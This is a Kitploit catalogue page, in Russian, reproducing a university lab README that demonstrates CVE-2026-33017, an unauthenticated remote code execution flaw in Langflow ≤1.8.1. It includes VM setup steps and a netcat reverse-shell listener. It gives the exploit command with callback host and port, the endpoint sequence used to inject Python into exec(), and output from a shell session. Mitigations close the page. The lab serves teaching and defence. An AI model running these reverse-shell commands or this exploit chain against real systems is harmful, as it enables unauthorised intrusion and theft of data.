Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33017 — # Образовательная лаборатория, демонстрирующая неаутентифицированное RCE в Langflow через CVE-2026-33017, с автоматической настройкой виртуальной машины и PoC-эксплойтом для обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/jorrit-vm/cve-2026-33017
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной НагрузкиЛаборатории и Практика
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Образовательная лаборатория, демонстрирующая неаутентифицированное RCE в Langflow через CVE-2026-33017, с автоматической настройкой виртуальной машины и PoC-эксплойтом для обратной оболочки.

13 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33017 — Langflow Unauthenticated RCE

HoGent CyberSecurity II — Netwerk Pentesting & Exploitatie (NPE)
Academiejaar 2025–2026

CVE CVSS Langflow


Обзор

Этот репозиторий содержит полную лабораторную среду и демонстрацию эксплуатации CVE-2026-33017 — критической уязвимости удалённого выполнения кода (RCE) без аутентификации в Langflow ≤ 1.8.1.

Атакующий без какой-либо аутентификации может выполнить произвольный Python-код на сервере через endpoint /api/v1/build_public_tmp/{flow_id}/flow, поскольку пользовательский ввод напрямую передаётся в Python exec() без песочницы или валидации.

⚠️ Дисклеймер: Этот репозиторий предназначен исключительно для образовательных целей в контролируемой лабораторной среде. Используйте только на системах, на которые у вас есть явное разрешение.


Архитектура

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

Структура репозитория

root@kitploit:~
CVE-2026-33017/
├── README.md # Этот файл
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Полное руководство по развёртыванию и атаке
└── scripts/
├── setup_vms.sh # Фаза 1: создание VirtualBox VM (HOST)
├── setup_victim.sh # Фаза 2: установка Langflow 1.8.1 (Ubuntu VM)
└── setup_attacker.sh # Фаза 3: установка PoC-инструмента (Kali VM)

Быстрый старт

Требования

  • VirtualBox 7.x с VBoxManage в PATH
  • Ubuntu_22.04-VB-64bit.vdi → переименуйте в ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → переименуйте в kali-linux.vdi
  • Оба VDI-файла в той же папке, что и setup_vms.sh

Фаза 1 — Создание VM (на хосте)

root@kitploit:~
bash scripts/setup_vms.sh

Фаза 2 — Настройка victim VM (на Ubuntu VM)

root@kitploit:~
# Учётные данные: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Фаза 3 — Настройка attacker VM (на Kali VM)

root@kitploit:~
# Учётные данные: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Выполнение атаки

Терминал 1 — Слушатель reverse shell:

root@kitploit:~
nc -lvnp 4444

Терминал 2 — Эксплойт:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

PoC автоматически устанавливается скриптом setup_attacker.sh.
Используемый PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Как работает эксплойт

ШагEndpointОписание
1GET /api/v1/auto_loginПолучает JWT-токен суперпользователя (AUTO_LOGIN=true)
2POST /api/v1/flows/Создаёт новый публичный flow через API
3POST /api/v1/build_public_tmp/{id}/flowВнедряет CustomComponent с вредоносным Python-кодом
4exec() в validate.py:397Код выполняется без песочницы — RCE

Доказательство выполнения

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Меры по смягчению

  • Обновитесь до Langflow ≥ 1.9.0 — удаляет уязвимый параметр data
  • Отключите LANGFLOW_AUTO_LOGIN в продакшене
  • Ограничьте сетевой доступ к порту 7860 через брандмауэр
  • Разместите Langflow за аутентифицирующим reverse proxy

Ссылки

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC от omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

Скачать инструмент